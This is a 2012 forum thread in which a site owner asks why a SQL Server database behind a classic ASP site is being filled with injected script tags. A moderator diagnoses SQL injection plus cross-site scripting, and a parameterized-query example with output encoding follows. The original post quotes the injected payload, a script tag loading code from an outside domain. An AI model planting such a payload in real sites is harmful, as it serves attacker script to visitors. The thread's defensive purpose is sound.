Security Issue - script being inserted in database
Friday, August 17, 2012 23:35
Hello everyone,
I am having a serious issue with our SQL database.
We have SQL Server Express 2005 running on a Windows 2003 Web Edition virtual machine.
We have a classic ASP website that uses this database and runs on the same server.
Our database is being constantly attacked, updating all rows with values like "<script src="http://ecall09edytu.rr.nu/sl.php?v=2"></script>"
I don't know how they are getting access to do this.
I have changed all passwords, limited the access to the server (FTP and remote desktop) to only my personal IP, disabled remote access to SQL Server...
Any ideas?
Anything you can think of will be greatly appreciated.
Thank you very much,
Juan
All Replies
Saturday, August 18, 2012 02:47 Moderator
This looks like a combination of SQL injection and cross-site scripting. The cause of SQL injection is failure to use parameterized queries in application code. If one builds SQL statement strings by concatenating user input, a malicious user can manipulate the SQL statement so that a statement other than the one intended is executed.
Dan Guzman, SQL Server MVP, http://weblogs.sqlteam.com/dang/
- Marked as Answer by amber zhang (Moderator), Friday, August 24, 2012 07:56
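
The parameterized-query fix described in the answer above, sketched for a classic ASP page using ADO, with output encoding for the cross-site scripting half. This is an added example, not code from the thread; the Products table, its Id and Notes columns, the request field names and the Application("ConnString") setting are hypothetical.

```vbscript
<%
' ADO constants (values as defined in adovbs.inc)
Const adCmdText = 1, adParamInput = 1, adInteger = 3, adVarWChar = 202
Const adExecuteNoRecords = 128

Dim conn, cmd, rs, productId, notes

' Accept only a plain run of digits before converting
' (IsNumeric alone would also accept inputs such as "1e5").
Function IsDigits(s)
    Dim re : Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsDigits = re.Test(s & "")
End Function

If Not IsDigits(Request.QueryString("id")) Then
    Response.Status = "400 Bad Request"
    Response.End
End If
productId = CLng(Request.QueryString("id"))
notes = Left(Request.Form("notes") & "", 500)

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")   ' hypothetical setting holding the connection string

' Vulnerable pattern (do not use): user input becomes part of the SQL text.
'   conn.Execute "UPDATE Products SET Notes = '" & notes & "' WHERE Id = " & Request.QueryString("id")

' Parameterized: the statement text is fixed; values travel separately as typed parameters.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "UPDATE Products SET Notes = ? WHERE Id = ?"
cmd.Parameters.Append cmd.CreateParameter("@notes", adVarWChar, adParamInput, 500, notes)
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , productId)
cmd.Execute , , adExecuteNoRecords

' Read back with a parameter as well, and HTML-encode on output
' so that any stored markup is rendered as text rather than executed.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT Notes FROM Products WHERE Id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , productId)
Set rs = cmd.Execute
If Not rs.EOF Then Response.Write Server.HTMLEncode(rs("Notes") & "")

rs.Close : conn.Close
%>
```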

